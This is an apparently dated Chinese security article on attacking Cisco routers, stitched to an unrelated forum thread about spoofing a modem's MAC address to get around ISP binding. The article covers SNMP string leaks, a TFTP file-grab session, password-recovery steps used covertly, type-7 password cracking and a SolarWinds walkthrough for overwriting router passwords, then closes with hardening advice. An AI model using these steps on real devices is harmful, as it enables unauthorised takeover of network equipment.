当通过"snmpwalk"(一种检测SNMP配置正确性的工具),或者使用设备的只读社团字符串遍历基于视图的访问控制MIB来检查设备时,就会泄漏读写社团字符串。这意味着知道只读社区字串允许读访问存储在设备中的MIB,导致信息泄露。而更为严重的是,如果知道读写社区字符串就可以允许远程配置的路由,可以绕开授权认证机制,从而完全控制路由器的整体功能。
题外话:一个被发现漏洞很具有讽刺意味,使用nmap等安全扫描工具对路由进行扫描,居然会产生DoS的攻击。有兴趣的朋友可以参阅:http://online.securityfocus.com/archive/1/28601/2002-11-29/2002-12-05/1
【另类攻击】
前面的漏洞综述,似乎我们都在围绕着如何获得路由配置信息而讲述,因为得到一个完整Router-config,那么我们便掌握了路由的世界。下面的入侵方法则另辟奚径。
*TFTP的艺术
Cisco的熟练管理员,一般习惯于Cisco免费提供的TFTP服务器(http://www.cisco.com/pcgi-bin/tablebuild.pl/tftp),而Cisco培训的书籍总会介绍使用copy running-config tftp的命令来保存路由配置文件。于是获得TFTP就有可能获得路由配置文件。
幸运的是,TFTPD守护程序存在目录遍历的漏洞,允许远程用户从目标系统中获得任意文件。我们可以通过下面简单方法获取目标系统中的任何文件:
Exploit
tftp> connect target_machine
tftp> get cisco-conf.bin
Recieved 472 bytes in 0.4 seconds
tftpd> quit
而这个免费软件还没有任何修补措施,因此借助这种方式,可以不费吹灰之力就可能得到一份完整的路由配置存档。
*SSH安全感
通过Telnet管理方式,造就了一批密码窃听者。通过明文的ASCII的网络传输形式,窃听者随便放置嗅探装置(sniffer),就可安闲的等待着登录用户,密码以及各类敏感信息自动送到面前。SSH加密方式在路由器的应用,大大的消灭了这种嚣张的气焰。
但入侵与反入侵本来就是个古老的话题。于是,SSH也开始有了危机感。Cisco SSH存在着三个精妙且复杂的漏洞,这种攻击的手法所涉及的知识已经大大超出本文的范畴,所以以简略的形式给予说明并指出应用漏洞的文章出处。(这些漏洞整理自中国网络安全响应中心CNSAN,http://www.cns911.com/holes/router/router01062902.php,在此对漏洞整理工作者的无私工作给予致敬。)
1.RC-32完整性检查漏洞
参考:http://www.core-sdi.com/files/files/11/CRC32.pdf
作者运用及其复杂的数学方式来证明这种漏洞的存在性,看懂这片文章需要相当的数学功底,本人在看这篇文章的时候也是头痛万分。不过文章中的理论分析十分精彩,初学者可以省略此漏洞。
CNSAN的文章则指出“要使这种攻击成功,攻击者要拥有一或者2个已知chipertxt/plaintext串,这一般并不难,因为每个进程启动时的问候屏幕是固定并可探测的,这样可以通过SNIFF进程来获得相应的chipertext”。
2.通信分析
参考:http://online.securityfocus.com/archive/1/169840
CNSAN的文章论述:“要利用这个漏洞,攻击者必须捕获信息包,这样可以分析使用的密码长度并用暴力手段猜测密码”。
在SSH中封装明文数据时,数据从8字节的边界上开始封装并对数据进行加密。这样的包在明文数据长度之后进行某中数学封装,SSH在加密通道内以明文的方式传输,结果,能检测SSH传输的攻击就能获得SSH内的内容。文章还友善的给出了Patch程序来修正这个漏洞。
3.在SSH 1.5协议中KEY恢复
参考:http://www.securityfocus.com/archive/1/161150
CNSAN的文章论述:要利用这个协议,攻击者必须能嗅探SSH进程并能对SSH服务器建立连接,要恢复SERVER KEY,攻击者必须执行2^20+2^19=1572864 连接,由于KEY是一小时的生存时间,所以攻击者必须每秒执行400此连接。
这种技巧的要求非常高,通常的远程入侵中,使用KEY来获得SSH会话过程的概率相当之低。
*本地密码劫持
在所有入侵中,这种类型的入侵活动可谓是蓄谋以久的野蛮做法。方法本来的意图是用于管理员忘记密码后的恢复措施。而技术做为双刃剑的一面,便在于我们如何使用它。
如果你有一台笔记本电脑,你有一根与路由器相应类型的连接线,那么你配备了入侵路由的武器。剩下的时间,你将思考如何闭开网管的眼睛,把连接线与路由器连接。以后的动作,需要你行动迅速了。(以25xx系列路由为例)
1.切断路由器的电源。
2.连接计算机与路由器。
3.打开超级终端(CTL-Break in Hyperterm)。
4.在启动路由器的30秒时间内,迅速按CTL-Break组合键,使路由器进入rom monitor 状态,出现提示符如下:
Followed by a '>' prompt...
5.输入 O/R 0x2142,修改配置注册器(config register)路由器从Flash
memory引导。
6.输入I,路由器初始化设置后重新启动。
7.输入系统配置 对话提示符敲no,一直等提示信息显示: Press RETURN to get started。
8.输入enable 命令,出现Router# 提示符。
这是,我们可以完全使用show命令查看路由中的一切配置,并可转储到计算机上。如果使用了enable的加密方式,虽然现在无法看,但可以使用工具进行破解。当然,粗鲁的做法是直接修改:
Router#conf  term
Router(conf)#enable password 7 123pwd
进行完以上操作,别忘了恢复路由的正常状态,否则网管很快就能发现问题所在:
Router(conf)#config-register 0x2102
Router(conf)#exit
至此,我们从几个方面试图获得整个路由的配置,那么如何进一步扩大入侵的战果,一些令人激动的工具给我们带来的无比愉悦的方便。
【触及RouterKit】
就如攻击视窗系统人喜欢用NTRK,攻击Linux的人则喜欢用rootkit,Router的世界也有这优秀的Kit,让人爱不释手。
*密码破解机
得到路由配置文件后,如果看见在特权模式的配置中可能会有:“enable password 7 14341B180F0B187875212766”这样的加密字串。那么恭喜了,enable password命令的密码加密机制已经很古老,存在极大安全漏洞。通过一些简单的工具就可以得到破解的特权密码。
实用工具资源:
SPHiXe's 的'C'版本破解机:http://www.alcrypto.co.uk/cisco/c/ciscocrack.c
Riku Meskanen的Pearl版本:http://www.alcrypto.co.uk/cisco/perl/ios7decrypt.pl
BigDog的Psion 3/5 版本:http://www.alcrypto.co.uk/cisco/psion/cisco.opl
Major Malfunction的Palm-Pilot破解机:http://www.alcrypto.co.uk/cisco/pilot/ciscopw_1-0.zip
Boson Windows版本GetPass:http://www.boson.com/promo/utilities/getpass/getpass_utility.htm
Mudge描述的漏洞生成原因:http://www.alcrypto.co.uk/cisco/mudge.txt
从这些资源,得知,password的安全机制是如此的薄弱,因此,在现在的配置环境中一般采用enable secrect较新安全加密机制。
*RAT的丰厚礼物
RAT是系统管理网络安全研究机构(SANS)开发的免费路由审核工具(route audit tools)。这套工具能自动和立即的检索路由配置的情况,并针对配置的问题给出极其详尽的漏洞发现和推荐修改配置,并能寻址SNMP的漏洞给予安全建议。这种安全的配置文档对于管理员和黑帽来说,都是非常珍贵的资料。
RAT是用Pearl语言编写而成,因此在Windows需要安装ActiveState Perl的环境。安装过程十分简单,对于路由的扫描结果以Html和ASCII文本格式给予用户查看。下面是扫描的具体实例。
Exploit:
C:\>perl c:\rat\bin\rat –a –u username –w passwd –e enablepass {router_ip_addr}
snarfing router_ip_addr...done.
auditing router_ip_addr...done.
ncat_report: Guide file rscg.pdf not found in current directory.  Searching...
Linking to guide found at c:\rat/rscg.pdf
ncat_report: writing {router_ip_addr}.ncat_fix.txt.
ncat_report: writing {router_ip_addr}.ncat_report.txt.
ncat_report: writing {router_ip_addr}.html.
ncat_report: writing rules.html (cisco-ios-benchmark.html).
ncat_report: writing all.ncat_fix.txt.
ncat_report: writing all.ncat_report.txt.
ncat_report: writing all.html.
(注:-a参数扫描所有漏洞选项,-u登录帐户,-w登陆密码,-e特权模式密码。扫描产生的漏洞检测报告和安全建议则使用ncat_report写入相关文件中。{router_ip_addr}是实际的路由IP地址)
可以说RAT 是IOS的安全配置检测工具,提供了详细的配置安全漏洞,并提供Fix Script for {router_ip_addr}的修补脚本,这样周全的工具不仅是管理员的福音,也给入侵者带来巨大好处。如果入侵者得到这样一份周详的报告,情况会有多糟糕?
可惜的是,这样优秀的程序在对路由配置文件进行检索时,所用的snarf程序是以telnet的方式对配置文件进行检索,这样的话,任何传输过程都将是明文的方式,而程序的文档介绍中推荐使用的SSH协议本身也并不完善(可参阅【另类攻击】部分的介绍),这样就为攻击者提供了偷窃的途径,从而获得路由全面的明晰配置图,这样结果对于网管来说将是多么的不幸。因此我们需要谨慎的使用这个威力巨大的工具。
当然,这个优秀的免费工具带给我们的另一个丰厚的礼物便是程序中自动装入《路由安全配置指南》(RSCG)的PDF文档,里面详尽的Cisco安全路由配置文档介绍了路由的管理和安全配置方式,给出薄弱的路由配置配置说明。这种实惠既便利了安全工作者对于理解,也成为了攻击者利用漏洞的极佳参考。
*终极力量Solarwinds
Solarwinds公司出品Solarwinds.net的全面产品中包容了针对许多管理监测Cisco设备的精美工具,良好的GUI、容易操作的截面、还有Perfect的Toolbar(比较起庞大而复杂的Ciscowork管理软件,我偏向于Solarwinds提供的简单配置工具,当然Ciscowork如果被攻击者运用,那么破坏的威力简直可以搞拷一个大型网站的通信枢纽。至于Ciscowork的使用说明,因为篇幅问题,不在赘述)。
主要工具简介:
SNMP Dictionary Attack
SNMP字典攻击用于测试SNMP的社区字串的强度。在SNMP字典攻击中,攻击程序首先装载社区字串习惯用语字典和字典编辑器编辑的字典,然后按照字典排序进行猜解。
SNMP Brute Force Attack
SNMP暴力破解程序将会以字母和数字的组合形式远程对SNMP的只读字串和读写字串进行穷举破解,同时我们可以定义包括的字符和字串的估计长度,这样有助于加快破解速度。
Router Security Check
路由安全检查程序能尝试的进入到路由器中并提示IOS是否需要升级,同时它也自动尝试只读和读写的SNMP社区字串。下面就是一个实际检测的结果:
IP Address202.xx.xx.xxSystem Namecisco7507Contact--Test Contact—010xxxxxxLocationCisco Internetwork Operating System Software IOS (tm) RSP Software (RSP-AJSV-M), Version 12.0(7), RELEASE SOFTWARE (fc1)Copyright (c) 1986-1999 by cisco Systems, Inc.Compiled Wed 13-Oct-99 23:20 by phanguyeRead-Only Community StringsILMIxxxxRead-Write Community StringsILMIXxxx
注:从结果看,我们获得了读写字串,这种利用方式在前面已经论述过,不在重复。使用x隐含了真实的属性资料。
Remote TCP Session Reset
可以远程显示路由器上的所有TCP活动连接,更有意思的是,如果得知SNMP社区的读写字串,这个程序可以随意切断TCP的连接,这种恶作剧也常常让人苦恼不堪。
Cisco Router Password Decryption
不言而喻,这个程序是用来破解特权模式下的密码。至于如何取得密码,请参阅【触及RouterKit】的说明。
当然,除了以上几种工具外,Solarwinds来集合了实用的Config Editor/View,upload Config,Download Config,Running Vs Startup Configs,Proxy Ping, Advanced CPU Load,Router CPU Load路由配置管理工具,通过工具名字我们不难得出这些工具的用途。
Solarwinds牛刀小试
这里将使用Solarwinds的工具组合进行一次高层次的入侵演习。不过这里的先决条件是,你已经通过各种漏洞探测针方式获取了社区可读写的字串(粗鲁的做法就可利用通过Solarwinds SNMP暴力破解方式来获取读写字串)。
首先,创建一个包含新密码的文本文件:
enable password New*Password
注:这种设置甚至可以覆盖enable secret 5加密设置,不清楚Cisco既然得知Password 7方式加密是非常容易破解的,为什么还要保留这个遗物。
接着,在文件中输入修改登录密码的语句:
line vty 0 4password New*Passwordlogin
启动Solarwinds自带的TFTP服务器,把创建的文件放置到服务器的根目录中。并在Config uploader实用工具中输入路由地址,读写字串和TFTP服务器的地址,并在TFTP目录中选择刚才创建的文件,按“Copy config PC to Router/Switch”。大致过程如图示:
通过这种隐蔽的方式,我们更改了路由器的登录密码和特权模式密码。这种把戏经常让通过远程管理路由的网管大吃一惊,但重启路由后我们设置的密码就失效了。原因在于我们是在Running-conf模式下修改路由配置,而没有保存到NVRAM中。当然,许多过激的做法干脆使用修改的密码登录路由器,把配置文件写(write)到NVRAM。强权控管路由设备。
【几点安全建议】
综述了这些触目惊心的漏洞和威力无比工具的应用,我们是否应该行动起来,采取适当的措施来保护自身利益呢?
*关于IOS的问题
1.通过no ip http server取消http服务,消除Http带来的隐患。
2.限制SNMP访问配置
access-list 10 permit 204.50.25.0 0.0.0.255snmp-server community readwrite RW 10 (通过ACL限制受信主机访问)###########监测非授权的SNMP访问配置##########snmp-server enable traps  (设置陷阱)snmp-server trap-authentication (如何认证失败,告诉路由发送陷阱。)snmp-server host 204.50.25.5 (陷阱消息接受工作站)(注:ciscoworks 工作站可以截获这些信息。)
3.及时升级Cisco的IOS程序或者修补程序
4.推荐阅读RAT中的RSCG文档建议
5.利用安全工具对路由进行安全检查。
关于安全的建议问题,不是一劳永逸的事情,漏洞在暗处挖掘着,新的技术在不断膨胀着,因此以上的几点建议只作为参考,实际的运用当中我们应该根据实际情况作出正确的策略。
【参考资料】
1.https://alerts.securityfocus.com/
2.http://www.cisco.com/warp/public/
3.http://www.insecure.org/news/P55-10.txt
4.http://www.sans.org/
5.http://www.networkingunlimited.com/white007.html
6.http://us.cns911.com/holes/router/
7.http://www.securiteam.com/
注:几点说明,由于许多网站里关于路由的资料文章很多,因此我只给出网站地址,不给出具体的文章出处,烦劳各位朋友到相关网站查询。
Copyright ? 1998-2003 XFOCUS Team. All Rights Reserved
http://bbs.hardsalon.com/printpage.asp?BoardID=5&ID=112183
以文本方式查看主题
-  星网数码论坛  (http://www.star-net.com.cn/aspsky/index.asp)
--  通讯接入产品  (http://www.star-net.com.cn/aspsky/list.asp?boardid=5)
----  [求助]怎么破解电信路由限制  (http://www.star-net.com.cn/aspsky/dispbbs.asp?boardid=5&id=32236)
--------------------------------------------------------------------------------
--  作者:whx2295
--  发布时间:2004-10-19 19:29:00
--  [求助]怎么破解电信路由限制
我的是2110EH 4.5版,今天被电信绑定MAC地址,连网卡MAC也一块被绑,现在不能开通路由了,请问有哪位高手知道破解办法?怎么才能重新开通路由?
--------------------------------------------------------------------------------
--  作者:ahy882001
--  发布时间:2004-10-20 0:10:00
--
把猫的MAC修改成绑定的MAC就可以了。方法论坛上有,自己找吧!
--------------------------------------------------------------------------------
--  作者:whx2295
--  发布时间:2004-10-20 8:49:00
--
意思是要换一个猫吗??
--------------------------------------------------------------------------------
--  作者:hncscb
--  发布时间:2004-10-20 9:26:00
--
这个方法能行吗
--------------------------------------------------------------------------------
--  作者:whx2295
--  发布时间:2004-10-20 13:23:00
--
二楼的 ahy882001老兄,能不能再说得详细点,这个论坛我都翻到50多页了,也没找到你所说的方法.能不能再说得详细点,我先谢谢了
--------------------------------------------------------------------------------
--  作者:dis
--  发布时间:2004-10-20 20:08:00
--
如果你的锚支持改MAC,你就改吧,如果不支持,买个可以改MAC的路由共享器吧,使用猫的拔号方式,把路由器当成网卡,电信再有办法也只好认命了.
--------------------------------------------------------------------------------
--  作者:whx2295
--  发布时间:2004-10-21 9:54:00
--
我的猫支持改MAC。我先把它改为网卡的MAC,再开通路由,重启后进猫的WEB页面(进页面改了网卡的MAC,不然PING不通猫),发现PPPOE项是绿灯、也显示了自动分配的IP,这应该证明路由是连上了,可打不网页就是上不了网,再把网卡的MAC改为绑定的也不行,不知道这又是什么原因???
--------------------------------------------------------------------------------
--  作者:sand
--  发布时间:2004-10-21 23:46:00
--
楼主在哪个城市呢?我这两天好像也给限制了。我在广州。但不是绑定网卡,我用不同的计算机拨号都可以拨。设置路由后的症状就如whx2285描述:”显示了自动分配的IP,这应该证明路由是连上了,可打不网页就是上不了网,“
--------------------------------------------------------------------------------
--  作者:whx2295
--  发布时间:2004-10-22 15:25:00
--
湖南湘潭
想了好多办法都不行,现在只好做个服务器了。。
下次找个路由器试试
--------------------------------------------------------------------------------
--  作者:xtjordan
--  发布时间:2004-10-22 19:07:00
--
你的猫是实达的什么版本的?我也是湘潭的!
--------------------------------------------------------------------------------
--  作者:luodin
--  发布时间:2004-10-22 22:20:00
--
湖南湘潭的那位,我是湘潭星光电脑的,经我们研究,我们有单独的路由器可以解决这个问题,电话:0732-8219672 地址是:车站路22号星河电脑城二楼828、838号
--------------------------------------------------------------------------------
--  作者:yzm506
--  发布时间:2004-10-23 10:50:00
--
根据你的目前的惨状你有2种方法可以实现共享上网
1。用路由器。把路由器的mac地址改成网卡的。现在市场上有很多路由器很便宜200多块就可以搞定
2。做代理服务器。用被绑定mac地址的网卡上网。
--------------------------------------------------------------------------------
--  作者:whx2295
--  发布时间:2004-10-23 15:46:00
--
以下是引用luodin在2004-10-22 22:20:00的发言:
湖南湘潭的那位,我是湘潭星光电脑的,经我们研究,我们有单独的路由器可以解决这个问题,电话:0732-8219672 地址是:车站路22号星河电脑城二楼828、838号
好的,我单位就在贵公司对面,星河也常去,现在用的是代理服务器,如果想换路由器的话,再来找你:)
--------------------------------------------------------------------------------
--  作者:Taurus75
--  发布时间:2004-11-5 23:41:00
--
以下是引用whx2295在2004-10-23 15:46:00的发言:

好的,我单位就在贵公司对面,星河也常去,现在用的是代理服务器,如果想换路由器的话,再来找你:)
把猫的MAC Spoofing功能打开后改成需要的地址就可以了。
--------------------------------------------------------------------------------
--  作者:pa1314
--  发布时间:2004-11-18 17:00:00
--
我也是湘潭的,我把MAC Spoofing功能打开了,怎么还是不行啊
--------------------------------------------------------------------------------
--  作者:dkgj
--  发布时间:2004-11-20 23:05:00
--
是湘潭的找我,不要你再买别的设备,搞定一户收50元。我也是湘潭的。
--------------------------------------------------------------------------------
--  作者:kunki
--  发布时间:2004-11-22 16:06:00
--
我也是湘潭的,我可以确定的告诉你:
不用增加任何设备,把猫的MAC地址改成被绑定网卡的MAC地址即可。
楼上的小心电信猪找麻烦啊,呵呵。。。
--------------------------------------------------------------------------------
--  作者:hexing
--  发布时间:2004-12-8 20:05:00
--
哈哈!天天和电信打的了!
--------------------------------------------------------------------------------
Powered By :Dvbbs Version 7.0.0 Sp2
Copyright ?2002 - 2005 STARNTEDIGITAL
执行时间:78.12500毫秒。查询数据库4次。
当前模板样式:[默认模板]